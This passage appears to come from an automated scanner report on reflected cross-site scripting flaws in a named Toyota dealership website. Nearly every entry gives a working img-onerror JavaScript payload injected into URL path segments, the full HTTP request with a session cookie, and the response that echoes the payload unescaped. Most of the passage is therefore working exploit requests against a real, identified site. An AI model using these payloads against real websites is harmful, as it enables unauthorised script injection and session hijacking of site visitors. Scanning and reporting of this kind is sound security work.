Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:53:55 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:53:55 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 19453
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7440d"><img%20src%3da%20onerror%3dalert(1)>b79a1049d8a was submitted in the REST URL parameter 3. This input was echoed as 7440d"><img src=a onerror=alert(1)>b79a1049d8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/Cupertino/About%20Us7440d"><img%20src%3da%20onerror%3dalert(1)>b79a1049d8a/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:10:32 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:10:33 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:10:33 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 17903
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 680a3"><img%20src%3da%20onerror%3dalert(1)>438ce2e30f3 was submitted in the REST URL parameter 3. This input was echoed as 680a3"><img src=a onerror=alert(1)>438ce2e30f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/Fremont/About%20Us680a3"><img%20src%3da%20onerror%3dalert(1)>438ce2e30f3/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:06:17 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:06:17 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:06:18 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 18783
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1fd"><img%20src%3da%20onerror%3dalert(1)>b42fba3063d was submitted in the REST URL parameter 3. This input was echoed as be1fd"><img src=a onerror=alert(1)>b42fba3063d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/Milpitas/About%20Usbe1fd"><img%20src%3da%20onerror%3dalert(1)>b42fba3063d/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:08:40 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:08:40 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:08:41 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 17667
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc80e"><img%20src%3da%20onerror%3dalert(1)>240fa67c43a was submitted in the REST URL parameter 2. This input was echoed as cc80e"><img src=a onerror=alert(1)>240fa67c43a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Leandrocc80e"><img%20src%3da%20onerror%3dalert(1)>240fa67c43a/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:17:48 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:17:48 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:17:49 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 19735
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <META NAME=KEYWORDS CONTENT="San Leandrocc80e"><img src=a onerror=alert(1)>240fa67c43a Toyota, San Leandrocc80e"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3c8de<img%20src%3da%20onerror%3dalert(1)>f59247f9b79 was submitted in the REST URL parameter 2. This input was echoed as 3c8de<img src=a onerror=alert(1)>f59247f9b79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Leandro3c8de<img%20src%3da%20onerror%3dalert(1)>f59247f9b79/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:23:20 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:23:20 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:23:21 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 19590
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <H1>Serving San Leandro3c8de<img src=a onerror=alert(1)>f59247f9b79 - Fremont Toyota</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a172'><img%20src%3da%20onerror%3dalert(1)>fdb3d2720d was submitted in the REST URL parameter 2. This input was echoed as 7a172'><img src=a onerror=alert(1)>fdb3d2720d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Leandro7a172'><img%20src%3da%20onerror%3dalert(1)>fdb3d2720d/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:20:49 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:20:49 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:20:50 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 19732
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <img src='http://images.carprices.com/pricebooks_data/usa/colorized/2010/Toyota/View/FJ_Cruiser_4x4/Base/4703_058.jpg' alt='San Leandro7a172'><img src=a onerror=alert(1)>fdb3d2720d Toyota - 2010 Toyota FJ Cruiser 4x4 V6 Base' style='padding-bottom:10px;'/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b06c"><img%20src%3da%20onerror%3dalert(1)>e68bbd579d7 was submitted in the REST URL parameter 3. This input was echoed as 7b06c"><img src=a onerror=alert(1)>e68bbd579d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Leandro/About%20Us7b06c"><img%20src%3da%20onerror%3dalert(1)>e68bbd579d7/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:33:47 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:33:48 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:33:48 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 18361
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b182a"><img%20src%3da%20onerror%3dalert(1)>3da4656882f was submitted in the REST URL parameter 2. This input was echoed as b182a"><img src=a onerror=alert(1)>3da4656882f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Mateob182a"><img%20src%3da%20onerror%3dalert(1)>3da4656882f/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:31:06 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:31:07 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:31:07 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 19592
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <META NAME=KEYWORDS CONTENT="San Mateob182a"><img src=a onerror=alert(1)>3da4656882f Toyota, San Mateob182a"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5ad98'><img%20src%3da%20onerror%3dalert(1)>0affbfd0b06 was submitted in the REST URL parameter 2. This input was echoed as 5ad98'><img src=a onerror=alert(1)>0affbfd0b06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Mateo5ad98'><img%20src%3da%20onerror%3dalert(1)>0affbfd0b06/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:35:53 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:35:54 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:35:54 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 19669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <img src='http://images.carprices.com/pricebooks_data/usa/colorized/2011/Toyota/View/4Runner/Limited/8668_1G3.jpg' alt='San Mateo5ad98'><img src=a onerror=alert(1)>0affbfd0b06 Toyota - 2011 Toyota 4Runner 4.0L Automatic Limited' style='padding-bottom:10px;'/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 158cb<img%20src%3da%20onerror%3dalert(1)>041e9d54138 was submitted in the REST URL parameter 2. This input was echoed as 158cb<img src=a onerror=alert(1)>041e9d54138 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Mateo158cb<img%20src%3da%20onerror%3dalert(1)>041e9d54138/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:39:31 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:39:32 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:39:32 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 19450
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <H1>Serving San Mateo158cb<img src=a onerror=alert(1)>041e9d54138 - Fremont Toyota</H1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d40ae"><img%20src%3da%20onerror%3dalert(1)>83a12b1460d was submitted in the REST URL parameter 3. This input was echoed as d40ae"><img src=a onerror=alert(1)>83a12b1460d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/San%20Mateo/About%20Usd40ae"><img%20src%3da%20onerror%3dalert(1)>83a12b1460d/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:47:21 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:47:21 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:47:22 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 18036
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1de38<img%20src%3da%20onerror%3dalert(1)>0e2f428d2ec was submitted in the REST URL parameter 2. This input was echoed as 1de38<img src=a onerror=alert(1)>0e2f428d2ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/4Runner1de38<img%20src%3da%20onerror%3dalert(1)>0e2f428d2ec/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:40:20 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:21 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:40:21 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16155
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota 4Runner1de38 ...[SNIP]... <H1> Toyota 4Runner1de38<img src=a onerror=alert(1)>0e2f428d2ec</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb8d"><img%20src%3da%20onerror%3dalert(1)>212fce5c129 was submitted in the REST URL parameter 2. This input was echoed as bbb8d"><img src=a onerror=alert(1)>212fce5c129 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/4Runnerbbb8d"><img%20src%3da%20onerror%3dalert(1)>212fce5c129/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:33:31 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:33:31 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:33:32 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16209
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota 4Runnerbbb8d ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota 4Runnerbbb8d"><img src=a onerror=alert(1)>212fce5c129 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota 4Runnerbbb8d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 32d8e'><img%20src%3da%20onerror%3dalert(1)>f59e0d5d6d7 was submitted in the REST URL parameter 2. This input was echoed as 32d8e'><img src=a onerror=alert(1)>f59e0d5d6d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/4Runner32d8e'><img%20src%3da%20onerror%3dalert(1)>f59e0d5d6d7/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:37:03 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:37:04 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:37:04 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16240
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota 4Runner32d8e ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=4Runner32d8e'><img src=a onerror=alert(1)>f59e0d5d6d7'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7297a'><img%20src%3da%20onerror%3dalert(1)>f6d145712fc was submitted in the REST URL parameter 2. This input was echoed as 7297a'><img src=a onerror=alert(1)>f6d145712fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Avalon7297a'><img%20src%3da%20onerror%3dalert(1)>f6d145712fc/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:28:09 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:28:10 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:28:10 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16209
